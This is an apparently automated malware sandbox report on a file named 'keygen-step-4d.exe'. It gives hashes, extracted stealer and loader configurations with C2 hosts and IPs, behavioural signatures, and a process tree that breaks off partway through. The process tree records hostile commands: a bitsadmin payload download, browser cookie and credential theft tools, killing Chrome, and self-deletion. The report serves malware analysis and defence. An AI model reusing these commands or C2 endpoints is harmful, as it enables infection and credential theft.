Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1037s
  • max time network
    1098s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    28-04-2021 04:33

Errors

Reason
Machine shutdown

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

redline

Botnet

EUU

C2

download3.info:80

Extracted

Family

redline

Botnet

1414

C2

188.119.112.16:46409

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • BlackNET

    BlackNET is an open source remote access tool written in VB.NET.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected facebook phishing page
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 2 IoCs
  • Drops file in System32 directory 14 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 15 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 52 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 19 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • NTFS ADS 5 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 37 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:876
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:2032
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {BA138476-C9AB-4DD1-BEE7-1812319076E8} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
            3⤵
              PID:2992
              • C:\Users\Admin\AppData\Roaming\abihhrc
                C:\Users\Admin\AppData\Roaming\abihhrc
                4⤵
                • Suspicious use of SetThreadContext
                PID:2432
                • C:\Users\Admin\AppData\Roaming\abihhrc
                  C:\Users\Admin\AppData\Roaming\abihhrc
                  5⤵
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:532
              • C:\Users\Admin\AppData\Roaming\caihhrc
                C:\Users\Admin\AppData\Roaming\caihhrc
                4⤵
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:2084
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:1596
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:1612
        • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
          "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
          1⤵
          • Loads dropped DLL
          • Checks whether UAC is enabled
          • Suspicious use of WriteProcessMemory
          PID:1060
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
            2⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1944
            • C:\Windows\SysWOW64\rundll32.exe
              "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
              3⤵
              • Loads dropped DLL
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:388
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1376
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:364
            • C:\Users\Admin\AppData\Local\Temp\is-9G97D.tmp\Install.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-9G97D.tmp\Install.tmp" /SL5="$3017C,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:2028
              • C:\Users\Admin\AppData\Local\Temp\is-CT20B.tmp\Ultra.exe
                "C:\Users\Admin\AppData\Local\Temp\is-CT20B.tmp\Ultra.exe" /S /UID=burnerch1
                4⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Adds Run key to start application
                • Modifies system certificate store
                • Suspicious use of WriteProcessMemory
                PID:1916
                • C:\Program Files\Windows Sidebar\ULESBALBBH\ultramediaburner.exe
                  "C:\Program Files\Windows Sidebar\ULESBALBBH\ultramediaburner.exe" /VERYSILENT
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1348
                  • C:\Users\Admin\AppData\Local\Temp\is-HP53V.tmp\ultramediaburner.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-HP53V.tmp\ultramediaburner.tmp" /SL5="$3018A,281924,62464,C:\Program Files\Windows Sidebar\ULESBALBBH\ultramediaburner.exe" /VERYSILENT
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    PID:1752
                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                      7⤵
                      • Executes dropped EXE
                      PID:2012
                • C:\Users\Admin\AppData\Local\Temp\4a-664fc-1fb-6c0aa-f9506f177a714\Nupagiryvy.exe
                  "C:\Users\Admin\AppData\Local\Temp\4a-664fc-1fb-6c0aa-f9506f177a714\Nupagiryvy.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:1152
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                    6⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    PID:324
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:324 CREDAT:275457 /prefetch:2
                      7⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:948
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 2356
                        8⤵
                        • Program crash
                        • Suspicious behavior: GetForegroundWindowSpam
                        PID:2956
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:324 CREDAT:406543 /prefetch:2
                      7⤵
                      • Modifies Internet Explorer settings
                      • NTFS ADS
                      • Suspicious use of SetWindowsHookEx
                      PID:2660
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:324 CREDAT:1258520 /prefetch:2
                      7⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:1844
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 1432
                        8⤵
                        • Executes dropped EXE
                        • Program crash
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: GetForegroundWindowSpam
                        • Suspicious behavior: MapViewOfSection
                        PID:2696
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:324 CREDAT:996372 /prefetch:2
                      7⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:2708
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:324 CREDAT:996385 /prefetch:2
                      7⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:2168
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                    6⤵
                      PID:2140
                  • C:\Users\Admin\AppData\Local\Temp\9e-a1444-7c6-f68a8-e809f71aadce8\Vocaevabaha.exe
                    "C:\Users\Admin\AppData\Local\Temp\9e-a1444-7c6-f68a8-e809f71aadce8\Vocaevabaha.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1688
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iloigvec.rjl\skipper.exe /s & exit
                      6⤵
                        PID:2568
                        • C:\Users\Admin\AppData\Local\Temp\iloigvec.rjl\skipper.exe
                          C:\Users\Admin\AppData\Local\Temp\iloigvec.rjl\skipper.exe /s
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:2976
                          • C:\Users\Admin\AppData\Local\Temp\2061178358.exe
                            C:\Users\Admin\AppData\Local\Temp\2061178358.exe
                            8⤵
                              PID:2556
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                9⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:2644
                            • C:\Users\Admin\AppData\Local\Temp\1658869161.exe
                              C:\Users\Admin\AppData\Local\Temp\1658869161.exe
                              8⤵
                                PID:2068
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                  9⤵
                                    PID:2560
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                    9⤵
                                      PID:2212
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\iloigvec.rjl\skipper.exe & exit
                                    8⤵
                                      PID:2288
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping 0
                                        9⤵
                                        • Runs ping.exe
                                        PID:2176
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\33uutknp.haf\001.exe & exit
                                  6⤵
                                    PID:2308
                                    • C:\Users\Admin\AppData\Local\Temp\33uutknp.haf\001.exe
                                      C:\Users\Admin\AppData\Local\Temp\33uutknp.haf\001.exe
                                      7⤵
                                        PID:2644
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pfqorgz3.fqy\gpooe.exe & exit
                                      6⤵
                                        PID:2236
                                        • C:\Users\Admin\AppData\Local\Temp\pfqorgz3.fqy\gpooe.exe
                                          C:\Users\Admin\AppData\Local\Temp\pfqorgz3.fqy\gpooe.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Adds Run key to start application
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:2620
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:2072
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                              PID:2828
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                                PID:1552
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xxq41iir.x2t\google-game.exe & exit
                                            6⤵
                                              PID:2656
                                              • C:\Users\Admin\AppData\Local\Temp\xxq41iir.x2t\google-game.exe
                                                C:\Users\Admin\AppData\Local\Temp\xxq41iir.x2t\google-game.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Drops file in Program Files directory
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                • Suspicious use of SetWindowsHookEx
                                                PID:2216
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                  8⤵
                                                    PID:1284
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\efwdvpps.4ky\askinstall39.exe & exit
                                                6⤵
                                                  PID:2364
                                                  • C:\Users\Admin\AppData\Local\Temp\efwdvpps.4ky\askinstall39.exe
                                                    C:\Users\Admin\AppData\Local\Temp\efwdvpps.4ky\askinstall39.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                    PID:2468
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                      8⤵
                                                        PID:2824
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /f /im chrome.exe
                                                          9⤵
                                                          • Kills process with taskkill
                                                          PID:2348
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\brnyqdyi.3oy\requête.exe & exit
                                                    6⤵
                                                      PID:2632
                                                      • C:\Users\Admin\AppData\Local\Temp\brnyqdyi.3oy\requête.exe
                                                        C:\Users\Admin\AppData\Local\Temp\brnyqdyi.3oy\requête.exe
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        PID:2080
                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:2384
                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                            parse.exe -f json -b firefox
                                                            9⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            PID:2024
                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                            parse.exe -f json -b chrome
                                                            9⤵
                                                              PID:2396
                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                              parse.exe -f json -b edge
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                              PID:2556
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\clluxfnv.ci4\SunLabsPlayer.exe /S & exit
                                                        6⤵
                                                          PID:2336
                                                          • C:\Users\Admin\AppData\Local\Temp\clluxfnv.ci4\SunLabsPlayer.exe
                                                            C:\Users\Admin\AppData\Local\Temp\clluxfnv.ci4\SunLabsPlayer.exe /S
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of SetThreadContext
                                                            • Drops file in Program Files directory
                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                            PID:964
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:2836
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:2308
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2632
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:2376
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                      8⤵
                                                                      • Drops file in Program Files directory
                                                                      PID:1940
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:2364
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                        8⤵
                                                                        • Checks for any installed AV software in registry
                                                                        PID:1196
                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                        8⤵
                                                                        • Download via BitsAdmin
                                                                        PID:2288
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pLZQiSM75KRmgEsZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        PID:992
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plIt7BMSl5CGLPUK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:1720
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        • Drops file in Program Files directory
                                                                        PID:2396
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                        8⤵
                                                                        • Drops file in Program Files directory
                                                                        PID:2060
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:1116
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:2920
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:268
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                              8⤵
                                                                                PID:1516
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                                  9⤵
                                                                                    PID:3000
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:2244
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2316
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2736
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:2560
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd56C9.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:2304
                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                      8⤵
                                                                                        PID:2480
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hgjqhoaa.ksp\005.exe & exit
                                                                                    6⤵
                                                                                      PID:2628
                                                                                      • C:\Users\Admin\AppData\Local\Temp\hgjqhoaa.ksp\005.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\hgjqhoaa.ksp\005.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                        PID:588
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\buuq4nyv.nlc\GcleanerWW.exe /mixone & exit
                                                                                      6⤵
                                                                                        PID:1344
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ks1za3q4.vb1\toolspab1.exe & exit
                                                                                        6⤵
                                                                                          PID:2412
                                                                                          • C:\Users\Admin\AppData\Local\Temp\ks1za3q4.vb1\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\ks1za3q4.vb1\toolspab1.exe
                                                                                            7⤵
                                                                                              PID:2556
                                                                                              • C:\Users\Admin\AppData\Local\Temp\ks1za3q4.vb1\toolspab1.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\ks1za3q4.vb1\toolspab1.exe
                                                                                                8⤵
                                                                                                  PID:2696
                                                                                            • C:\Windows\System32\cmd.exe
